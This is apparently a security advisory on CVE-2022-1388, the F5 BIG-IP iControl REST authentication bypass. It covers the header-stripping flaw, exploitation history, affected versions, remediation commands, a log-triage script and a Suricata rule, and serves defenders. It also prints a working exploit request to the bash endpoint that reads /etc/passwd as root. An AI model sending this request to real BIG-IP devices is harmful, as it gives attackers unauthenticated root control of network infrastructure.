
CVE-2022-1388: F5 BIG-IP iControl REST — Authentication Bypass to RCE

CVE Details

CVE ID CVE-2022-1388
CVSS Score 9.8
Severity Critical
Vendor F5
Product BIG-IP
Patch Status Available
Published February 21, 2026

Background

F5 BIG-IP is one of the most widely deployed application delivery controller and load balancer platforms, used extensively in enterprise data centres, financial institutions, government agencies, and critical infrastructure. BIG-IP devices sit in front of production application infrastructure and are trusted with traffic management, SSL termination, load balancing, and security policy enforcement. The iControl REST API is the primary programmatic management interface for BIG-IP.

CVE-2022-1388 is a CVSS 9.8 (AV:N) authentication bypass in the iControl REST interface. Disclosed on May 4, 2022, it allows any attacker who can reach the management port or a self IP address, which in the many deployments that expose management to the internet means a remote, unauthenticated attacker, to execute arbitrary commands as root without any credentials. F5 described it as allowing an unauthenticated attacker “with network access to the BIG-IP system through the management port and/or self IP addresses” to execute arbitrary system commands, create or delete files, and disable services. Mass exploitation began within days of advisory publication.

Technical Mechanism

CVE-2022-1388 is an authentication bypass rooted in how the iControl REST front end and back end divide authentication between them, and in how the HTTP Connection header is interpreted on the way from one to the other.

BIG-IP’s iControl REST API is served at https://<mgmt_ip>/mgmt/. A request is authenticated either with local credentials sent as HTTP Basic authentication or with a session token carried in the X-F5-Auth-Token header.

When a request arrives at the iControl REST interface, it passes through an Apache (httpd) front end before being proxied to the back-end REST daemon (restjavad). The bypass exploits the interaction between:

  1. The Connection header, which per RFC 7230 names hop-by-hop headers that a proxy must remove before forwarding the request
  2. The X-F5-Auth-Token header, whose presence tells the Apache front end that the back end will validate the token, so the front end does not check Basic credentials itself

By sending Connection: X-F5-Auth-Token together with any X-F5-Auth-Token value, the attacker gets both behaviours at once. The front end sees a token header and skips its own Basic authentication; then, honouring the Connection header, it strips the token before proxying. restjavad therefore receives a request from the trusted local proxy that carries no token but does carry an Authorization: Basic header, and in the vulnerable code it treats that combination as “already authenticated by the front end” and takes the username from the Basic header (admin) without ever verifying a password.

# Exploit request bypassing authentication
# (Authorization decodes to "admin:", i.e. user admin with an empty password)
POST /mgmt/tm/util/bash HTTP/1.1
Host: bigip.target.com
Connection: X-F5-Auth-Token, keep-alive
X-F5-Auth-Token: dummy_value
Authorization: Basic YWRtaW46
Content-Type: application/json
Content-Length: 66

{"command":"run","utilCmdArgs":"-c 'id; whoami; cat /etc/passwd'"}

Public proof-of-concepts differ in the exact header set (several also send a localhost value in Host or X-Forwarded-Host), but the Connection/X-F5-Auth-Token pair is the constant.

The /mgmt/tm/util/bash endpoint, when reached with what the back-end treats as an authenticated request, executes arbitrary shell commands as root. This is the intended functionality of the bash utility endpoint for legitimate administration; the bypass makes it available without credentials.
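
The following is an added example, not F5 code and not taken from any public exploit: a small model of the request path described above, with a front end that strips hop-by-hop headers, a vulnerable and a fixed back end, and a switch that models F5’s published httpd mitigation (rewriting Connection to plain close/keep-alive). The account store, token store and requests are constructed; it never contacts a BIG-IP. It shows why the bypass works against the vulnerable back end, why it stops working once either tier is fixed, and that legitimate token and Basic logins still succeed.

```python
# Added example (not F5 code): a model of the CVE-2022-1388 request path.
# Front end (Apache) and back end (restjavad) are simulated with constructed
# account and token stores; nothing here talks to a real BIG-IP.
import base64

LOCAL_ACCOUNTS = {"admin": "correct-horse-battery"}   # constructed local accounts
VALID_TOKENS = {"tok-5f1c9a": "admin"}                # constructed token store


def _basic_credentials(headers):
    """Decode 'Authorization: Basic <b64>' into (user, password); (None, None) if absent."""
    auth = headers.get("authorization", "")
    if not auth.lower().startswith("basic "):
        return None, None
    user, _, password = base64.b64decode(auth.split(None, 1)[1]).decode().partition(":")
    return user, password


def strip_hop_by_hop(headers):
    """RFC 7230 proxy behaviour: remove Connection and every header it names."""
    names = {n.strip().lower() for n in headers.get("connection", "").split(",") if n.strip()}
    names.add("connection")
    return {k: v for k, v in headers.items() if k not in names}


def normalise_connection(headers):
    """Model of F5's httpd mitigation: Connection is rewritten to close/keep-alive only,
    so it can never name X-F5-Auth-Token as hop-by-hop."""
    value = headers.get("connection", "").lower()
    return {**headers, "connection": "keep-alive" if "keep-alive" in value else "close"}


def front_end(headers, mitigated=False):
    """Apache front end. A token header means 'the back end will validate this', so
    Basic credentials are not checked here; without a token they must be correct.
    Returns the headers as forwarded to restjavad, or None for a 401."""
    if mitigated:
        headers = normalise_connection(headers)
    if "x-f5-auth-token" not in headers:
        user, password = _basic_credentials(headers)
        if user is None or LOCAL_ACCOUNTS.get(user) != password:
            return None
    return strip_hop_by_hop(headers)


def backend_vulnerable(forwarded):
    """Vulnerable restjavad: no token means 'the front end already authenticated
    this', so the username in the Basic header is trusted without a password check."""
    if "x-f5-auth-token" in forwarded:
        return VALID_TOKENS.get(forwarded["x-f5-auth-token"])
    user, _ = _basic_credentials(forwarded)
    return user if user in LOCAL_ACCOUNTS else None


def backend_fixed(forwarded):
    """Hardened restjavad: a token must validate, or Basic credentials must verify."""
    if "x-f5-auth-token" in forwarded:
        return VALID_TOKENS.get(forwarded["x-f5-auth-token"])
    user, password = _basic_credentials(forwarded)
    return user if user is not None and LOCAL_ACCOUNTS.get(user) == password else None


def authenticate(request_headers, backend=backend_vulnerable, mitigated=False):
    """Run a request through both tiers; return the authenticated username or None."""
    forwarded = front_end({k.lower(): v for k, v in request_headers.items()}, mitigated)
    return None if forwarded is None else backend(forwarded)


def basic(user, password=""):
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


EXPLOIT = {  # the bypass request from the text; Authorization decodes to "admin:"
    "Host": "bigip.target.com",
    "Connection": "X-F5-Auth-Token, keep-alive",
    "X-F5-Auth-Token": "dummy_value",
    "Authorization": basic("admin"),
}
LEGIT_TOKEN = {"Host": "bigip.target.com", "X-F5-Auth-Token": "tok-5f1c9a"}
LEGIT_BASIC = {"Host": "bigip.target.com", "Authorization": basic("admin", "correct-horse-battery")}
WRONG_BASIC = {"Host": "bigip.target.com", "Authorization": basic("admin", "guess")}

if __name__ == "__main__":
    print("vulnerable, exploit :", authenticate(EXPLOIT))                     # admin
    print("httpd mitigation    :", authenticate(EXPLOIT, mitigated=True))     # None
    print("fixed back end      :", authenticate(EXPLOIT, backend_fixed))      # None
    print("valid token, fixed  :", authenticate(LEGIT_TOKEN, backend_fixed))  # admin
    print("wrong password      :", authenticate(WRONG_BASIC))                 # None
```

The model makes the design flaw explicit: each tier assumes the other did the password check, and the only thing binding the two assumptions together is a header that the attacker controls the lifetime of. Either fix (normalising Connection at the front end, or making the back end verify Basic credentials itself) breaks the chain; the shipped patch closes the back-end trust.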

Real-World Exploitation Evidence

Exploitation began within 2-3 days of the May 4, 2022 advisory. CISA and MS-ISAC later published joint advisory AA22-138A specifically warning of active exploitation:

  • Mass opportunistic exploitation: Security firm Horizon3 published a detailed technical analysis and working proof-of-concept on May 9, 2022 — four days after the advisory. This precipitated a significant increase in exploitation attempts.
  • Web shell deployment: The most common post-exploitation action was deploying JSP or Bash-based web shells in the BIG-IP HTTPD web root, enabling persistent access.
  • Credential harvesting: Attackers extracted configuration files containing admin credentials, certificates, and application server credentials.
  • Ransomware staging: Evidence of BIG-IP compromises being used as persistent footholds for later ransomware deployment.
  • Cryptominer deployment: Opportunistic actors deployed cryptocurrency miners on compromised BIG-IP hardware.

Security researchers observed over 650 internet-facing BIG-IP instances actively serving web shell responses within the first two weeks after advisory publication.

Impact Assessment

Compromise of a BIG-IP device is extremely serious:

  • Root shell: The iControl REST bash endpoint executes commands as root; exploitation is immediately at maximum privilege.
  • Traffic interception: BIG-IP terminates TLS for the applications behind it, so root access exposes the server private keys held in the configuration and lets an attacker capture or modify application traffic in plaintext on the device itself.
  • Downstream application compromise: BIG-IP has direct connectivity to back-end application servers and databases; it can be used to attack these internal systems.
  • Credential access: BIG-IP configuration files contain credentials for application pools, LDAP/AD integrations, and management interfaces.
  • Network position: BIG-IP devices are typically positioned in the DMZ with access to both internet-facing and internal network segments.

Affected Versions

BIG-IP Version   Affected             Fixed Version
17.0.x           Not affected         n/a
16.1.x           16.1.0 – 16.1.2      16.1.2.2 and later
15.1.x           15.1.0 – 15.1.5      15.1.5.1 and later
14.1.x           14.1.0 – 14.1.4      14.1.4.6 and later
13.1.x           13.1.0 – 13.1.4      13.1.5 and later
12.1.x           All                  No fix (end of technical support; upgrade required)
11.6.x           All                  No fix (end of technical support; upgrade required)

Remediation Steps

  1. Apply F5 patches: Update BIG-IP to the fixed versions above via tmsh or the F5 downloads portal.

  2. Block iControl REST access as an interim mitigation (these are F5's published workarounds):

    • Restrict management-interface access to trusted administrative hosts. Via TMSH (192.168.1.0/24 is a placeholder for your admin network):
      modify sys httpd allow replace-all-with { 192.168.1.0/24 }
      save sys config
    • Block iControl REST through self IP addresses by setting Port Lockdown to Allow None on every self IP (or Allow Custom excluding TCP 443, and 8443 on single-NIC VE). <self_ip_name> is a placeholder:
      modify net self <self_ip_name> allow-service none
      save sys config
    • F5 also published an httpd configuration change (applied with tmsh edit sys httpd all-properties) that rewrites the incoming Connection header to plain close or keep-alive, so a request can no longer name X-F5-Auth-Token as a hop-by-hop header.
  3. Verify no web shells exist: check the httpd document root (/usr/local/www) and other web-served paths for recently modified script files, and compare anything found against a known-good device:

    # Recently modified PHP/JSP files under the BIG-IP httpd document root
    find /usr/local/www -type f \( -name "*.php" -o -name "*.jsp" \) -mtime -30 -ls

    # Unexpected cron jobs (system-wide and per-user)
    grep -v "^#" /etc/cron.d/* /etc/crontab /var/spool/cron/* 2>/dev/null
  4. Review administrator accounts: Check for unexpected admin accounts:

    tmsh list auth user
  5. Rotate all credentials: If exploitation is suspected, rotate all management credentials, certificates, and any application credentials in the configuration.

Detection Guidance

Log sources:

  • BIG-IP /var/log/restjavad.*.log
  • /var/log/httpd/ssl_request.log
  • TMOS audit log: tmsh show sys log audit

Suspicious request indicators:

  • POST requests to /mgmt/tm/util/bash without valid auth token
  • Presence of Connection: X-F5-Auth-Token in HTTP requests to management interface
  • File creation events in web root directories
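
As an added example, not F5 tooling, the triage below runs the "who reached the command-execution endpoints, and from where" question over /var/log/httpd/ssl_request.log. It assumes the mod_ssl default request-log layout ([timestamp] client_ip tls_protocol cipher "METHOD URI HTTP/x.y" bytes), which is an assumption for BIG-IP, and the log lines and the management allowlist are constructed. Because this log does not record request headers, the Connection/X-F5-Auth-Token trick itself is invisible in it; what it does show is every source that hit the bash or file-upload endpoints and whether that source is an expected administrative host.

```python
# Added example (not F5 tooling): triage /var/log/httpd/ssl_request.log for
# CVE-2022-1388 activity. Log lines and allowlist below are constructed; the
# line format assumed is the mod_ssl default request log.
import re
from ipaddress import ip_address, ip_network

LINE_RE = re.compile(
    r'^\[(?P<ts>[^\]]+)\] (?P<ip>\S+) (?P<proto>\S+) (?P<cipher>\S+) '
    r'"(?P<method>\S+) (?P<uri>\S+)[^"]*" (?P<bytes>\S+)'
)

# iControl REST endpoints that give command execution or file write on the box.
HIGH_RISK = ("/mgmt/tm/util/bash", "/mgmt/shared/file-transfer/uploads/")

# Constructed: networks from which administrators legitimately use iControl REST.
MGMT_ALLOWLIST = [ip_network("192.168.1.0/24")]

# Constructed sample: a normal admin session, an attacker from 203.0.113.77
# (version probe, bash RCE, web-shell upload, then a TMUI visit), and a later
# legitimate-looking bash call from an allowlisted host that still needs review.
SAMPLE_LOG = """\
[10/May/2022:08:01:12 +0000] 192.168.1.10 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384 "POST /mgmt/shared/authn/login HTTP/1.1" 512
[10/May/2022:08:01:13 +0000] 192.168.1.10 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384 "GET /mgmt/tm/ltm/virtual HTTP/1.1" 2048
[10/May/2022:09:14:50 +0000] 203.0.113.77 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384 "GET /mgmt/tm/sys/version HTTP/1.1" 890
[10/May/2022:09:14:55 +0000] 203.0.113.77 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384 "POST /mgmt/tm/util/bash HTTP/1.1" 213
[10/May/2022:09:14:58 +0000] 203.0.113.77 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384 "POST /mgmt/shared/file-transfer/uploads/shell.jsp HTTP/1.1" 1187
[10/May/2022:09:15:03 +0000] 203.0.113.77 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384 "GET /tmui/login.jsp HTTP/1.1" 4096
[10/May/2022:11:02:09 +0000] 192.168.1.10 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384 "POST /mgmt/tm/util/bash HTTP/1.1" 233
"""


def parse_line(line):
    """Return the log fields as a dict, or None for a line that does not match."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def classify(record):
    """critical:   high-risk endpoint from outside the allowlist
       review:     high-risk endpoint from an allowlisted host (confirm with the admin)
       suspicious: any other iControl REST access from outside the allowlist
       ok:         everything else"""
    try:
        trusted = any(ip_address(record["ip"]) in net for net in MGMT_ALLOWLIST)
    except ValueError:            # malformed address: never trust it
        trusted = False
    uri = record["uri"]
    if uri.startswith(HIGH_RISK):
        return "review" if trusted else "critical"
    if uri.startswith("/mgmt/") and not trusted:
        return "suspicious"
    return "ok"


def triage(log_text):
    """Walk the log and return every non-ok access in order."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        level = classify(rec)
        if level != "ok":
            findings.append({"level": level, "ts": rec["ts"], "ip": rec["ip"],
                             "method": rec["method"], "uri": rec["uri"]})
    return findings


def sources_to_block(findings):
    """Distinct client IPs that reached a high-risk endpoint from outside the allowlist."""
    return sorted({f["ip"] for f in findings if f["level"] == "critical"})


if __name__ == "__main__":
    results = triage(SAMPLE_LOG)
    for f in results:
        print(f"{f['level']:10} {f['ts']} {f['ip']:15} {f['method']} {f['uri']}")
    print("block at the edge:", sources_to_block(results))
```

Every "critical" hit is a trigger for the full remediation list above (assume root compromise, rotate everything), and the "review" line is why allowlisting alone is not enough evidence of innocence: a bypassed request from a compromised admin workstation looks identical in this log. The restjavad log should then be checked for the same timestamps.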

Suricata signature:

alert http $EXTERNAL_NET any -> $HOME_NET [443,8443] (msg:"F5 BIG-IP CVE-2022-1388 iControl REST auth bypass attempt"; flow:established,to_server; http.uri; content:"/mgmt/"; startswith; http.header; content:"Connection|3a|"; nocase; content:"X-F5-Auth-Token"; nocase; within:80; classtype:attempted-admin; sid:9002138; rev:2;)

The rule keys on the Connection header naming X-F5-Auth-Token, which no legitimate client sends; matching merely on the presence of an X-F5-Auth-Token header would fire on every normal token-authenticated request. It also covers every /mgmt/ endpoint, since the bypass is not specific to util/bash. iControl REST is HTTPS only, so the rule can only fire where the sensor sees decrypted traffic (a TLS-terminating proxy in front of the management interface or a decrypted tap); for encrypted management traffic, rely on the restjavad and httpd logs listed above.

Timeline

Date            Event
May 4, 2022     F5 publishes advisory K23605346; patches released
May 6, 2022     Multiple PoC exploits published
May 9, 2022     Horizon3 publishes detailed technical analysis and full PoC
May 10, 2022    CISA adds CVE-2022-1388 to the KEV catalogue; mass exploitation wave begins, hundreds of shells deployed
May 18, 2022    CISA and MS-ISAC publish joint advisory AA22-138A on active exploitation
June 2022       Continued exploitation; BIG-IP compromise used in ransomware campaigns